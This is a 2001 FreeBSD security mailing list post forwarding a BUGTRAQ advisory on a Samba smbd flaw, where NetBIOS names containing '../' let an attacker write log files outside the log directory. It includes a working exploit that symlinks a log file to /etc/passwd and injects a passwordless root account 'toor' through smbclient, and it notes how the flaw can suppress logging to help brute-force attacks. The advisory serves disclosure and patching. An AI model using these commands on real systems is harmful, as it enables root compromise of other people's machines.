From owner-freebsd-security  Sun Jun 24  9:43:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44])
	by hub.freebsd.org (Postfix) with ESMTP
	id E12CA37B405; Sun, 24 Jun 2001 09:43:34 -0700 (PDT)
	(envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost)
	by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA14358;
	Sun, 24 Jun 2001 09:43:34 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29)
 via SMTP by point.osg.gov.bc.ca, id smtpda14356; Sun Jun 24 09:43:26 2001
Received: (from uucp@localhost)
	by passer.osg.gov.bc.ca (8.11.4/8.9.1) id f5OGhLn24777;
	Sun, 24 Jun 2001 09:43:21 -0700 (PDT)
Received: from UNKNOWN(10.1.2.1), claiming to be "cwsys.cwsent.com"
 via SMTP by passer9.cwsent.com, id smtpdT24775; Sun Jun 24 09:42:38 2001
Received: (from uucp@localhost)
	by cwsys.cwsent.com (8.11.4/8.9.1) id f5OGgOx31237;
	Sun, 24 Jun 2001 09:42:24 -0700 (PDT)
Message-Id: <200106241642.f5OGgOx31237@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys"
 via SMTP by localhost.cwsent.com, id smtpdt31230; Sun Jun 24 09:42:04 2001
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
Reply-To: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
X-Sender: schubert
To: security-officer@freebsd.org, dwcjr@freebsd.org
Cc: freebsd-security@freebsd.org
Subject: smbd remote file creation vulnerability (fwd)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sun, 24 Jun 2001 09:42:04 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Just received this from BUGTRAQ...

Security-officer & dwcjr, this is just a heads up that a Samba patch is 
coming down the pipe RSN.

freebsd-security mailing list users using Samba, FYI.


Regards,                         Phone:  (250)387-8437
Cy Schubert                        Fax:  (250)387-5766
Team Leader, Sun/Alpha Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC            


------- Forwarded Message

[headers removed]
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3454 invoked from network); 24 Jun 2001 04:25:44 -0000
X-Authentication-Warning: nimue.bos.bindview.com: lcamtuf owned process 
doing -bs
Date: Sat, 23 Jun 2001 23:24:26 -0400 (EDT)
From: Michal Zalewski <lcamtuf@bos.bindview.com>
To: bugtraq@securityfocus.com
Subject: smbd remote file creation vulnerability 
Message-ID: <Pine.LNX.4.21.0106232315510.10682-100000@nimue.bos.bindview
.com>
X-Nmymbofr: Nir Orb Buk
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


** Please hold with approving this one before Monday, if possible.
** This is a forced release.

Author: Michal Zalewski <lcamtuf@razor.bindview.com>

Topic:

   Insufficient parameter validation and unsafe default configuration
   make numerous systems running samba SMB file sharing daemon 
vulnerable
   to remote attacks.

Vulnerable platforms:

   Tested on smbd 2.0.7 shipped with RedHat Linux 7.0 and 7.1. Confirmed
   on 2.0.8.

Overview:

   Due to insufficient NetBIOS computer name validation in incoming SMB
   requests, in conjunction with default configuration found for example
   in RedHat Linux and derivates, samba daemon allows remote attackers 
   to create SMB session log files (*.log) with highly 
attacker-dependent
   contents outside outside logs directory. This vulnerability itself 
can
   be used to perform DoS attacks, or, if combined with unprivileged 
local
   access, can be used to gain superuser privileges.

   On vulnerable platforms, by default, each SMB session is logged
   to the file /var/log/samba/<netbios-name>.log. If the attacker is
   connecting from 'FOOBAR', logs would be put in /var/log/foobar.log.
   Unfortunately, NetBIOS name '../../../evil' would be accepted, as 
well,
   creating /evil.log file.

   This vulnerability is exploitable if the following setting is present
   in smb.conf file:

   log file = /var/log/samba/%m.log

   ...which is default on major Linux distributions, and probably few
   other platforms, as well. On some systems, configuration might be
   different:

   log file = /usr/local/samba/var/log.%m

   In the second case (e.g. FreeBSD), there is usually no way to exploit
   this vulnerability.

   Additionally, as noticed by Mark Loveless, using specific NetBIOS
   names, like 'non/existing/dir', it is possible to avoid logging
   of error messages (e.g. authentication failures) at all, which might 
be
   very useful for performing brute-force attacks.

   Note that any non-default configuration not using any prefix or
   suffix (log- or .log) in log filename would be vulnerable to
   instant remote compromise.

Exploit:

   This is the scenario of local privilege escalation attack against
   RedHat 7.x installation:

   $ ln -s /etc/passwd /tmp/x.log

   $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" 
\
     -n ../../../tmp/x -N

   ...where 'NIMUE' stands for local host name (few error messages
   should be returned).

   $ su toor
   #

   Explaination of this attack is pretty trivial. Samba daemon tries
   to access logfile for host introducing itself as '../../../tmp/x'.
   This translates to open() on /var/log/samba/../../../tmp/x.log.
   Thus, /tmp/x.log is opened in O_APPEND mode, following previously
   created symlink to /etc/passwd.

   Then, anonymous attempt to mount non-existing share named
   "\ntoor::0:0::/:/bin/sh\n" is logged in /tmp/x.log, or, if you
   prefer, in /etc/passwd. Error message looks this way:

   [2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925)
     Rejecting user 'lcamtuf': authentication failed
   [2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214)
     ../../../tmp/x (192.233.133.108) couldn't find service
     toor::0:0::/:/bin/sh

   The last line is, obviously, accepted by /bin/su or /bin/login.

Fix information:

   As a temporary workaround, we suggest changing 'log file' setting,
   as described above. This vulnerability has been confirmed by the
   vendor, and is addressed there:

   http://us1.samba.org/samba/whatsnew/macroexploit.html

   Removing '%m' at all would protect against attackers trying to avoid
   logging at all. Vendor was informed, fix will be publicly available
   soon.






------- End of Forwarded Message




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message